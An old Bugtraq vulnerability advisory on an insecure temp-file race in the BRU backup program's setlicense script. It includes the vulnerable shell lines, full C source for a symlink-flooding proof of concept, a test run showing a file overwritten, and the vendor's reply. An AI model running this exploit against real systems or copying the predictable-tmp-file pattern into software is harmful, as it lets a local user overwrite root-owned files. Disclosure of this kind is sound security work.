[24004] in bugtraq
bru backup program
daemon@ATHENA.MIT.EDU (Andrew Griffiths)
Mon Jan 28 13:47:30 2002
Date: Sat, 26 Jan 2002 21:00:55 +1100 (EST)
Message-Id: <200201261000.g0QA0sT13634@franklin.nt.tas.gov.au>
From: "Andrew Griffiths" <andrewg@tasmail.com>
To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-type: text/plain; charset=us-ascii
Product: Bru
Description:
------------
BRU provides fully verified backup and restore operations and offers options
for most conceivable data backup and recovery needs. BRU is fully device
independent, so it works with any device or filesystem that is supported by
your operating system. Verification is performed automatically with BRU's
Autoscan feature and can also be performed days, weeks, or even years after
a backup is performed.
[ As taken from bru.1 man page ]
Problem:
--------
The usage of insecure tmp files in some of the various shell scripts, which allows
you to overwrite arbitrary files with foobar. Since this script would most
likely be run by root, it allows you to overwrite any files you want.
Exploit:
--------
This is the beginnings of the setlicense shell script. For those who don't know,
$$ is the current pid of the shell.
#!/bin/sh
printf "%s" foobar >/tmp/brutest.$$ 2>&1
res=`cat /tmp/brutest.$$`
rm -f /tmp/brutest.$$
if test "$res" != "foobar"; then
alias printf="echo -n -e"
fi
So all that needs to be done is create a fair amount of symbolic links in the
temp directory pointing to the file you want to overwrite.
---[ CUT ]---
/* symace.c -0.0.1 - A generic filesystem symlink/race thinger */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
/* Please note that there is no error checking... */
/* By Andrew Griffiths (nullptr@tasmail.com) */
int main(int argc, char **argv)
{
char *overwrite;
char *base;
int start_pid, end_pid;
int i, size;
overwrite = strdup(argv[1]);
size = strlen(argv[2]) + 8 + 1;
base = malloc(size);
start_pid=atoi(argv[3]);
end_pid=atoi(argv[4]);
for(i=start_pid;i<end_pid;i++) {
memset(base, 0, size-1);
snprintf(base, size-1, "%s%d", argv[2], i);
if(symlink(overwrite, base)==-1) {
printf("Unable to create %s bailing\n", base);
exit(EXIT_FAILURE);
}
}
printf("done\n");
}
Vendor Respone:
---------------
This doesn't make much sense to me, exploiting your own system while you are already root? Correct me if I am wrong but this doesn't make much sense to me.
--Mike
BRU Support Team
The TOLIS Group - http://www.tolisgroup.com
support@tolisgroup.com
I think he didn't like my example down there. Everyone else on the list should be able to understand it without the need for a # sign...
Test Run:
---------
[andrewg@blackhole src]$ echo hello world > /tmp/hello
[andrewg@blackhole src]$ ./symace /tmp/hello /tmp/brutest. 12037 13000
done
On another terminal:
[andrewg@blackhole x86-linux-glibc2.1]$ ./setlicense
./setlicense: cd: /bru: No such file or directory
/bru does not exist. BRU may not be installed.
Then back to the other one...
[andrewg@blackhole src]$ cat /tmp/hello
foobar[andrewg@blackhole src]$
--
www.tasmail.com
